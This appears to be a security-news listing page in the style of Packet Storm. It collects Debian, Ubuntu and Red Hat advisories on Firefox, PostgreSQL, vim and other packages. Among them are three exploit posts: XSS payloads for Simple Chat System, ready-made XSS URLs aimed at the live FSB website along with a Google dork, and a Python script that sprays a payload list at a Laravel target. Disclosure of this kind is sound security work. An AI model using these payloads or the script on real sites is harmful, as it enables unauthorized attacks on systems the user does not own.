Debian Linux Security Advisory 5820-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, spoofing or cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5820-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 27, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-11692 CVE-2024-11694 CVE-2024-11695                 CVE-2024-11696 CVE-2024-11697 CVE-2024-11699Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, spoofing or cross-site scripting. For the stable distribution (bookworm), these problems have been fixed inversion 128.5.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmdHcXoACgkQEMKTtsN8TjbVxg/+NpPN+XZlnNqjVxWv48TJO30h6qh+Zf7SZ3ToyxKH/nvMEOKNsgbutlednaKDlfJbVa761JBSCVR/CyERS32hC+IGDdn9i5w0BS2IrMsPOnF/eU6OExgUr7rMMkPuKUp9+YGJJwfEDgqHWSGj0jr2S2HcyMAtx2vcINSIhzbIcO7xhxj6P4CGAA8/0l2eOq3YpclgYB23gP69arKDPj++AIv5lLpmg1bHr+aeXde9Am/roaEdvA6tK5PM4ay86TsSsMKjB9bQLjcpH8sHYoCt8VRA4qkCED2KAwQBxQ115imOoeRyJbRjWHpbIt9DEBxxsbYlQTldDhghV4YcsrIhEFaVY5zlDHYegEicxrCVoQJV0cHbpedeCp2otNEuM+crLl1l/CuSEeBkX2F1Ng1CM2/dGJpfuYN63mhO7Zs+UIuecqyLy7ZMe7Ucno2sNJnLPIwcx+zpQwLj/jUDzK89jzW4ZR6BQ5VOI2ex+blMsrYFKWuMoZhXpnlt7qC1/SzlseedwbyAeSXLBcLhMckXfshNsO/B6JmgluOb5i2BBLFlUOpSFwZdDoknaKxjXLF+EUhrV08R63pxKp5HZvsBiirQk1kfbhyReaaWjBn1nIOr5x0IASEGk+s4T80/s+5lJpGkqnzjwTK8bM58i7sN5qJIrJD2gAgtsXxyOYj02S4==Cop0-----END PGP SIGNATURE-----

Debian Security Advisory 5820-1

Simple Chat System version 1.0 suffers from a cross site scripting vulnerability.

Change Mirror Download

    #Exploit Title:Simple Chat System 1.0#Reflected XSS#Date:05/12/2024#Exploit Author:Merve Hatice Arslan#Vendor Homepage:https://code-projects.org/simple-chat-system/#Sofware Link:https://download.code-projects.org/details/ec6340ea-ef68-48d9-b9b2-da397f52b2dc#Version:1.0#Tested on:Linux / XAMPP#Scripting (XSS) in user.php via the name and username fields.#Payload:<img src=1 href=1 onerror="javascript:alert(1)"></img>

Simple Chat System 1.0 Cross Site Scripting

Ubuntu Security Notice 7132-1 - It was discovered that PostgreSQL incorrectly tracked tables with row security. A remote attacker could possibly use this issue to perform forbidden reads and modifications. Jacob Champion discovered that PostgreSQL clients used untrusted server error messages. An attacker that is able to intercept network communications could possibly use this issue to inject error messages that could be interpreted as valid query results.

==========================================================================  
Ubuntu Security Notice USN-7132-1  
December 02, 2024

postgresql-12, postgresql-14, postgresql-16 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in PostgreSQL.

Software Description:  
- postgresql-16: Object-relational SQL database  
- postgresql-14: Object-relational SQL database  
- postgresql-12: Object-relational SQL database

Details:

It was discovered that PostgreSQL incorrectly tracked tables with row  
security. A remote attacker could possibly use this issue to perform  
forbidden reads and modifications. (CVE-2024-10976)

Jacob Champion discovered that PostgreSQL clients used untrusted server  
error messages. An attacker that is able to intercept network  
communications could possibly use this issue to inject error messages that  
could be interpreted as valid query results. (CVE-2024-10977)

Tom Lane discovered that PostgreSQL incorrectly handled certain privilege  
assignments. A remote attacker could possibly use this issue to view or  
change different rows from those intended. (CVE-2024-10978)

Coby Abrams discovered that PostgreSQL incorrectly handled environment  
variables. A remote attacker could possibly use this issue to execute  
arbitrary code. (CVE-2024-10979)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  postgresql-16                   16.6-0ubuntu0.24.10.1  
  postgresql-client-16            16.6-0ubuntu0.24.10.1

Ubuntu 24.04 LTS  
  postgresql-16                   16.6-0ubuntu0.24.04.1  
  postgresql-client-16            16.6-0ubuntu0.24.04.1

Ubuntu 22.04 LTS  
  postgresql-14                   14.15-0ubuntu0.22.04.1  
  postgresql-client-14            14.15-0ubuntu0.22.04.1

Ubuntu 20.04 LTS  
  postgresql-12                   12.22-0ubuntu0.20.04.1  
  postgresql-client-12            12.22-0ubuntu0.20.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart PostgreSQL to  
make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7132-1  
  CVE-2024-10976, CVE-2024-10977, CVE-2024-10978, CVE-2024-10979

Package Information:  
  https://launchpad.net/ubuntu/+source/postgresql-16/16.6-0ubuntu0.24.10.1  
  https://launchpad.net/ubuntu/+source/postgresql-16/16.6-0ubuntu0.24.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-14/14.15-0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/postgresql-12/12.22-0ubuntu0.20.04.1

Ubuntu Security Notice USN-7132-1

Ubuntu Security Notice 6846-2 - USN-6846-1 fixed vulnerabilities in ansible. The update introduced a regression in ansible. This update fixes the problem. It was discovered that Ansible incorrectly handled certain inputs when using tower_callback parameter. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to obtain sensitive information. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6846-2December 02, 2024ansible regression==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS- Ubuntu 16.04 LTSSummary:USN-6846-1 caused some regression in ansible.Software Description:- ansible: Configuration management, deployment, and task execution systemDetails:USN-6846-1 fixed vulnerabilities in ansible. The update introduced aregression in ansible. This update fixes the problem.We apologize for the inconvenience.Original advisory details: It was discovered that Ansible incorrectly handled certain inputs when using tower_callback parameter. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to obtain sensitive information. This issue only affected Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. (CVE-2022-3697) It was discovered that Ansible incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to perform a Template Injection. (CVE-2023-5764)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS  ansible                         2.5.1+dfsg-1ubuntu0.1+esm3                                  Available with Ubuntu ProUbuntu 16.04 LTS  ansible                         2.0.0.2-2ubuntu1.3+esm3                                  Available with Ubuntu ProIn general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6846-2  https://ubuntu.com/security/notices/USN-6846-1  https://launchpad.net/bugs/2073569

Ubuntu Security Notice USN-6846-2

Ubuntu Security Notice 7131-1 - It was discovered that Vim incorrectly handled memory when closing a buffer, leading to use-after-free. If a user was tricked into opening a specially crafted file, an attacker could crash the application, leading to a denial of service.

==========================================================================  
Ubuntu Security Notice USN-7131-1  
November 27, 2024

vim vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 24.10  
- Ubuntu 24.04 LTS  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS  
- Ubuntu 14.04 LTS

Summary:

Vim could be made to crash if it received specially crafted input.

Software Description:  
- vim: Vi IMproved - enhanced vi editor

Details:

It was discovered that Vim incorrectly handled memory when closing a  
buffer, leading to use-after-free. If a user was tricked into opening a  
specially crafted file, an attacker could crash the application, leading to  
a denial of service.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 24.10  
  vim                             2:9.1.0496-1ubuntu6.2

Ubuntu 24.04 LTS  
  vim                             2:9.1.0016-1ubuntu7.5

Ubuntu 22.04 LTS  
  vim                             2:8.2.3995-1ubuntu2.21

Ubuntu 20.04 LTS  
  vim                             2:8.1.2269-1ubuntu5.29

Ubuntu 18.04 LTS  
  vim                             2:8.0.1453-1ubuntu1.13+esm11  
                                  Available with Ubuntu Pro

Ubuntu 16.04 LTS  
  vim                             2:7.4.1689-3ubuntu1.5+esm26  
                                  Available with Ubuntu Pro

Ubuntu 14.04 LTS  
  vim                             2:7.4.052-1ubuntu3.1+esm20  
                                  Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-7131-1  
  CVE-2024-47814

Package Information:  
  https://launchpad.net/ubuntu/+source/vim/2:9.1.0496-1ubuntu6.2  
  https://launchpad.net/ubuntu/+source/vim/2:9.1.0016-1ubuntu7.5  
  https://launchpad.net/ubuntu/+source/vim/2:8.2.3995-1ubuntu2.21  
  https://launchpad.net/ubuntu/+source/vim/2:8.1.2269-1ubuntu5.29

Ubuntu Security Notice USN-7131-1

The Russian FSB appears to suffer from a cross site scripting vulnerability. The researchers who discovered it have reported it multiple times to them.

/*!  
- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation  
- # Authenticated Persistent XSS  
- # GOOGLE DORK: inurl:fsb.ru/fsb/sh.htm?query=  
- # DATE: 2024-11-29  
- # SECURITY RESEARCHER:  E1.Coders  
- # VENDOR: FSB [ http://www.fsb.ru/ ]  
- # SOFTWARE LINK: http://www.fsb.ru/  
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C  
- # CWE: CWE-79  
*/

  ### -- [ Info: ]

 [i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.

 [i] Vulnerable parameter(s): sh.htm?query=  < AND >  /fsb/sh.htm?query=

  ### -- [ Impact: ]

 [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

  ### -- [ Payloads: ]

 `"'><img src=xxx:x \x22onerror=javascript:alert(1)>

 "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />

 `"'><img src=xxx:x onerror\x09=javascript:alert(1)>

  ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\x09=javascript:alert(1)%3E

 http://www.fsb.ru/fsb/sh.htm?query=%22/%3E%3Cimg/onerror=\x20javascript:alert(1)\x20src=xxx:x%20/%3E

 http://www.fsb.ru/fsb/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\x22onerror=javascript:alert(1)%3E

  ### -- [ Contacts: ]

 [+] E-Mail: E1.Coders@Mail.Ru

 [+] GitHub: @e1coders

Russian FSB Cross Site Scripting

Laravel version 11.0 suffers from a cross site scripting vulnerability.

    /*!- # VULNERABILITY: Cross Site Scripting Laravel version 11.0 - # Authenticated Persistent XSS- # GOOGLE DORK: inurl:.com/?q=- # GOOGLE DORK: Site:.com/?q=- # DATE: 2024-12-01- # SECURITY RESEARCHER:  E1.Coders- # VENDOR: LARAVEL [https://laravel.com/ ]- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C- # CWE: CWE-79- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt*/  ### -- [ Info: ] [i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0  website. [i] Vulnerable parameter(s): - inurl:.com/?q=    [AND]    Site:.com/?q=  ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.  ### -- [ EXPLOIT : ]   import requests # Target URLurl = "https://TARGET.com/?q=" # Function to read payloads from a filedef read_payloads(filename="payloads.txt"):    try:        with open(filename, "r") as f:            payloads = [line.strip() for line in f]        return payloads    except FileNotFoundError:        print(f"Error: File '{filename}' not found.")        return [] # Function to perform the requestdef xss_attack(url, payload):    full_url = url + payload    try:        response = requests.get(full_url)        return response.status_code, response.text # return status code and response text    except requests.exceptions.RequestException as e:        print(f"An error occurred during the request: {e}")        return None, None # Main function to iterate over payloads and attackdef main():    payloads = read_payloads()    if not payloads:        return     results = []    for payload in payloads:        status_code, response_text = xss_attack(url, payload)        if status_code:          results.append({"payload": payload, "status_code": status_code, "response": response_text})     #Save results to a file (Example, you might need to adjust based on your desired output)    with open("attack_results.txt", "w") as f:        for result in results:            f.write(f"Payload: {result['payload']}\n")            f.write(f"Status Code: {result['status_code']}\n")            f.write(f"Response: {result['response']}\n\n") if __name__ == "__main__":    main()   ### -- [ Contacts: ] [+] E-Mail: E1.Coders@Mail.Ru [+] GitHub: @e1coders

Laravel 11.0 Cross Site Scripting

Ubuntu Security Notice 7092-2 - USN-7092-1 fixed a vulnerability in mpg123. Bastien Roucariès discovered that the fix was incomplete on Ubuntu 20.04 LTS. This update fixes the problem. It was discovered that mpg123 incorrectly handled certain mp3 files. If a user or automated system were tricked into opening a specially crafted mp3 file, a remote attacker could use this issue to cause mpg123 to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-7092-2November 27, 2024mpg123 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:mpg123 could be made to crash or run programs as your login if it opened aspecially crafted file.Software Description:- mpg123: MPEG layer 1/2/3 audio playerDetails:USN-7092-1 fixed a vulnerability in mpg123. Bastien Roucariès discoveredthat the fix was incomplete on Ubuntu 20.04 LTS. This update fixes theproblem.We apologize for the inconvenience.Original advisory details: It was discovered that mpg123 incorrectly handled certain mp3 files. If a user or automated system were tricked into opening a specially crafted mp3 file, a remote attacker could use this issue to cause mpg123 to crash, resulting in a denial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  libmpg123-0                     1.25.13-1ubuntu0.2  mpg123                          1.25.13-1ubuntu0.2In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7092-2  https://ubuntu.com/security/notices/USN-7092-1  CVE-2024-10573, https://launchpad.net/bugs/2089680Package Information:  https://launchpad.net/ubuntu/+source/mpg123/1.25.13-1ubuntu0.2

Ubuntu Security Notice USN-7092-2

Red Hat Security Advisory 2024-8704-03 - Kube Descheduler Operator for Red Hat OpenShift 5.0.2 for RHEL 9.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8704.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Kube Descheduler Operator for Red Hat OpenShift 5.0.2 for RHEL 9Advisory ID:        RHSA-2024:8704-03Product:            Kube Descheduler OperatorAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8704Issue date:         2024-12-02Revision:           03CVE Names:          CVE-2024-24786====================================================================Summary: Kube Descheduler Operator for Red Hat OpenShift 5.0.2 for RHEL 9Red Hat Product Security has rated this update as having a security impact ofModerate. A Common Vulnerability Scoring System (CVSS) base score, which gives adetailed severity rating, is available for each vulnerability from the CVElink(s) in the References section.Description:The Kube Descheduler Operator for Red Hat OpenShift is an optionaloperator that deploys the descheduler, which is responsible forevicting pods based on certain strategies.Security Fix(es):* Calling any of the Parse functions containing deeply nested literals can causea panic/stack exhaustion (CVE-2024-34155)* Calling Parse on a \"// +build\" build tag line with deeply nested expressionscan cause a panic due to stack exhaustion (CVE-2024-34158)* encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON (CVE-2024-24786)Solution:CVEs:CVE-2024-24786References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268046https://bugzilla.redhat.com/show_bug.cgi?id=2310527https://bugzilla.redhat.com/show_bug.cgi?id=2310529

Red Hat Security Advisory 2024-8704-03

Red Hat Security Advisory 2024-10704-03 - An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include bypass, cross site scripting, and spoofing vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10704.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: thunderbird security update  
Advisory ID:        RHSA-2024:10704-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:10704  
Issue date:         2024-12-02  
Revision:           03  
CVE Names:          CVE-2024-11159  
====================================================================

Summary: 

An update for thunderbird is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

Security Fix(es):

* thunderbird: Potential disclosure of plaintext in OpenPGP encrypted message (CVE-2024-11159)

* firefox: thunderbird: CSP Bypass and XSS Exposure via Web Compatibility Shims (CVE-2024-11694)

* firefox: thunderbird: Unhandled Exception in Add-on Signature Verification (CVE-2024-11696)

* firefox: thunderbird: Select list elements could be shown over another site (CVE-2024-11692)

* firefox: thunderbird: Memory safety bugs fixed in Firefox 133, Thunderbird 133, Firefox ESR 128.5, and Thunderbird 128.5 (CVE-2024-11699)

* firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters (CVE-2024-11695)

* firefox: thunderbird: Improper Keypress Handling in Executable File Confirmation Dialog (CVE-2024-11697)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-11159

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2325896  
https://bugzilla.redhat.com/show_bug.cgi?id=2328941  
https://bugzilla.redhat.com/show_bug.cgi?id=2328943  
https://bugzilla.redhat.com/show_bug.cgi?id=2328946  
https://bugzilla.redhat.com/show_bug.cgi?id=2328947  
https://bugzilla.redhat.com/show_bug.cgi?id=2328948  
https://bugzilla.redhat.com/show_bug.cgi?id=2328950

Latest News